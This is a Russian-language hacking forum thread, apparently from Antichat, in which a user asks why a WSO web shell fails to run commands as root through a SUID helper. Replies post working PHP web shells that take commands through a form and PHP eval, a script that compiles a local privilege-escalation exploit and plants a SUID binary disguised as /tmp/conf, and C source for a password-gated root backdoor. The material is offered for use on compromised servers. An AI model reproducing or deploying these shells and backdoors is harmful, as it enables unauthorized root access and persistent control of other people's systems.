нужен шелл что бы указать суид и быть под рутом. попробовал wso который в этой ветке. но при активации суида почему то выбросило в форму пароля и при вводе пароля появляется лишь надпись сверху X-Powered-By: PHP/5.2.9 Content-type: text/html; charset=utf-8 и строка ввода пароля. кто знает как исправить или посоветуйте похожий скрипт.
скажите как правильно в wso suid указывать? у меня он лежит в папке с шеллом я указываю ./suid при нажатии он выдает что все root но потом когда нажимаешь по ссылкам шелла н выкидывает на страницу пароля и все. может я не правильно что делаю. помогите плиз мне срочно.
да я про этот и пишу. еще скачал wso там где два файла wso и wrapper.php указал путь к суиднику на шелл можно зайти вверху в шеле показано что я root но нельзя ходить по папкам и выполнять команды. только страница шелла и все. в чем же проблема?
Code: <?php /*********** CONFIGURATION **************/ $pass_suid = 'cool_hack'; // пароль, который мы установили в сорцах суидника /*********** END CONFIGURATION **********/ /*********** FUNCTIONS ***************/ /* Наша функция по выполнению команд Если существует файл /tmp/conf (так мы замаскировали наш суидник), то выполнение команд идет через него, иначе просто функцией system. */ function hack_system($cmd,$pass_suid) { if(file_exists('/tmp/conf')) { system('/tmp/conf '.$pass_suid.' "'.$cmd.'"')); } else{ system($cmd); } } /* Вот и главная функция, которая скопирует наш эксплойт и суидник, скомпилирует их и запустит */ function give_me_root() { // компилируем эксплойт system('gcc bsd-ktimer.c -o /tmp/ configure'); // компилируем суидник system('gcc suid.c -o /tmp/conf'); // запускаем сплойт, меняем «овнера» суиднику и устанавливаем права system('/tmp/configure; chown root /tmp/ conf; chmod 4777 /tmp/conf'); return print 'OK!'; } /********* END FUNCTIONS ***************/ print '<html>'. '<head>'. '<title>r00t web-shell</title>'. '</head>'. '<body>'; /*********** MAIN CODE ***************/ /* Выводим форму для выполнения команд */ if(!isset($_POST['cmd'])) { print '<form method="post">'. '<input name="cmd" type="text" value="ls -lia">'. '<input type="submit" value="Go">'. '</form><br><br>'; } else { hack_system($_POST['cmd'],$pass_suid); } /* Выводим заветную кнопочку для получения рута */ if(!isset($_POST['give_me_root'])) { print '<form method="post"> <input type="submit" name="give_me_root" value="Give me r00t"> </form>'; } else { give_me_root(); } /********** END CODE *************/ print '</body>'. '</html>'; ?> Мини-шелл + исполнение эксплойта
тут еще проблемка. при исполнении этих скриптов первого и второго в error_log'е вот такая вот ошибка: PHP Warning: Module 'mbstring' already loaded in Unknown on line 0
плин. ничего не понимаю. и в этом команды не выполняются. хотя когда нажимаешь give me root пишет ок. а команды не отоброжаются. в чем же тут проблема?
я вот такой суидник юзаю. может с ним что не так: #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { if(argc == 3){ if(strcmp(argv[1],"cool_hack") == 0){ setgid(0); setuid(0); system(argv[2]); } } return 0; }
Code: <?php //config $suid = ''; //путь до суидника $suid_pass = ''; //пароль к суиднику session_start(); error_reporting(E_ALL ^ E_NOTICE); $self=$HTTP_SERVER_VARS['PHP_SELF']; set_magic_quotes_runtime(0); @set_time_limit(0); if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}} @ini_set('max_execution_time',0); (@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF"); (@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0); (strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0); $action=$_POST['action']; $content=''; $stdata=''; $style='<STYLE>BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 11pt;color: #FFFAFA;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>'; $header='<html><head><title>'.getenv("HTTP_HOST").' - R00t Web-Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>'; $footer='</body></html>'; $lang=array('allfuncsh'=>'All function for work shell was disabled.'); $act=array('shell','phpeval');//here added new actions if(isset($action)){if(!in_array($action,$act))$action="shell";else $action=$action;}else $action="shell"; function shell($cmd,$suid_pass,$suid) { global $lang; $code = $suid.' '.$suid_pass.' "'.$cmd.'"'; $ret = ''; if(!empty($code)) { if(function_exists('exec')){ @exec($code,$ret);$ret = join("\n",$ret); } elseif(function_exists('shell_exec')) { $ret = @shell_exec($code); } elseif(function_exists('system')) { @ob_start() ;@system($code); $ret = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($code); $ret = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($code,"r"))) { $ret = ""; while(!@feof($f)) { $ret .= @fread($f,1024); } @pclose($f); } else { $ret=$lang['allfuncsh']; } } return $ret; } //shell if($action=="shell"){ $content.="<form method=\"POST\"> <input type=\"hidden\" name=\"action\" value=\"shell\"> <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br> <textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'],$suid_pass,$suid)),"d","w")."</textarea><br> <input type=\"submit\" value=\"execute\"></form>";} //phpeval if($action=="phpeval"){ $content.="<form method=\"POST\"> <input type=\"hidden\" name=\"action\" value=\"phpeval\"> <input type=\"hidden\" name=\"dir\" value=\"".$dir."\"> <?php<br> <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br> ?><br> <input type=\"submit\" value=\"execute\"></form>"; if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);} ?><?=$header;?><table width="100%" bgcolor="#31333b" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Shell |. </a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">.| Php Eval |.</a></td><td><a href="#" onclick="history.back();">.| <-back |.</a></td><td><a href="#" onclick="history.forward();">.| forward->|.</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1> <tr><td>Safe mode: <?php echo $safe_mode;?><br>Disable functions: <?php echo $disfunc;?><br>OS: <?php echo shell("uname -a",$suid_pass,$suid);?><br>Server: <?php echo @getenv("SERVER_SOFTWARE")?><br>Id: <?php echo "Uid=".shell("id",$suid_pass,$suid); ?><br><? echo 'Server: '.@gethostbyname($_SERVER["HTTP_HOST"]).' You: '.$_SERVER['REMOTE_ADDR'];?></br></td></tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#363940 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?> <br></table><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#44474f BORDER=1 width=100% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=#44474f><tr><td><center><font color='#9acd32' face='Tahoma' size = 2><b>| COPYRIGHT BY ANTICHAT.RU | Made by Grinay | Modified by daniel_1024 |</b></font></center></td></tr></table><?=$footer;?> Скажи спасибо daniel_1024!